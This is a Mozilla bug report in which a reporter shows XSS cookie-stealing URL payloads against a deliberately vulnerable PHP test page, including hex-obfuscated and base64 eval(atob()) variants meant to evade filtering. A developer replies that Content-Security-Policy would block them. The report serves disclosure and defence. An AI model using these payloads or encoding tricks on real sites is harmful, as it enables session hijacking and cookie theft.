890162 - Javascript Cookie Stealing Injection In URL

Status: RESOLVED DUPLICATE of bug 528661

(Firefox :: Untriaged, defect)

Description

[Samar Dhwoj Acharya]

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 (Beta/Release)
Build ID: 20130627161504

Steps to reproduce:

- Encode the payload containing document.cookie theft script in XSS vulnerable URL (base64 alone or base64+javaobfuscator hex based encoding)
- Visit the payload injected URL

Below are all the examples tested:

Javascript/Cookie Stealing injection possible in Mozilla Firefox <= 22

Tested under: Firefox 22, 18
This bug does not affect chromium browser

Simple test script:

<?php
	echo $_GET['param'];
?>

A GET request trying to steal cookie but does not work on firefox:
http://localhost/moz.php?param=%3Cscript%3Ewindow.location=%27http://localhost/moz.php?param=%27+document.cookie%3C/script%3E

Obfuscated above payload using javascriptobfuscator.com and firefox still prevents the execution:

http://localhost/moz.php?param=%3Cscript%3Evar%20_0x3709=[%22\x6C\x6F\x63\x61\x74\x69\x6F\x6E%22,%22\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x63\x61\x6C\x68\x6F\x73\x74\x2F\x6D\x6F\x7A\x2E\x70\x68\x70\x3F\x70\x61\x72\x61\x6D\x3D%22,%22\x63\x6F\x6F\x6B\x69\x65%22];window[_0x3709[0]]=_0x3709[1]+document[_0x3709[2]];%3C/script%3E

Base64 encoded payload which bypasses and works like a charm:

http://localhost/moz.php?param=<script>eval(atob(unescape('d2luZG93LmxvY2F0aW9uPSdodHRwOi8vbG9jYWxob3N0L21vei5waHA/cGFyYW09Jytkb2N1bWVudC5jb29raWU=')))</script>

However, base64 payload failed in some cases. But the variation below works for every case.

Yet another variation works which is to first base64 encode the payload and then use the obfuscation tool from http://www.javascriptobfuscator.com/. The URL would be something like below:

http://localhost/moz.php?param=%3Cscript%3Evar%20_0xa14f=[%22\x64\x32\x6C\x75\x5A\x47\x39\x33\x4C\x6D\x78\x76\x59\x32\x46\x30\x61\x57\x39\x75\x50\x53\x64\x6F\x64\x48\x52\x77\x4F\x69\x38\x76\x62\x47\x39\x6A\x59\x57\x78\x6F\x62\x33\x4E\x30\x4C\x32\x31\x76\x65\x69\x35\x77\x61\x48\x41\x2F\x63\x47\x46\x79\x59\x57\x30\x39\x4A\x79\x74\x6B\x62\x32\x4E\x31\x62\x57\x56\x75\x64\x43\x35\x6A\x62\x32\x39\x72\x61\x57\x55\x3D%22];eval(atob(unescape(_0xa14f[0])));%3C/script%3E

This has been tested in real web app in the local environment and known to be working in firefox only. Chromium however filters all of the above injections and prevents redirect to prevent cookie theft. Note that IE and other browsers having less browser market share have not been tested.


Actual results:

Cookie theft javascript injection is successful. The redirection is successful thus leading to cookie theft.  Javascript injection is possible in firefox that lets users steal cookies if the cross site scripting bug exists in web applications. While XSS is a bug in web apps and not actually in firefox, firefox is known for preventing execution of client side scripts in URL to prevent possible cookie theft.


Expected results:

On finding document.cookie (or its encoded form), no redirection should have happened.

Comment 1

[Daniel Veditz [:dveditz]]

Your test page has an XSS "bug" (on purpose, I realize) which needs to be fixed in the page. Some browsers attempt to detect and filter XSS payloads found in the URL but Firefox is not one of them. At the moment the only tool we offer to help sites prevent XSS is support for the Content-Security-Policy header.

If your test site had a reasonable policy it would prevent all of these examples. Even the extremely lax policy "Content-Security-Policy: default-src *" would prevent this.

I am not sure why your script didn't run in the first examples... I suspect it did run but threw errors which you might be able to see on the error console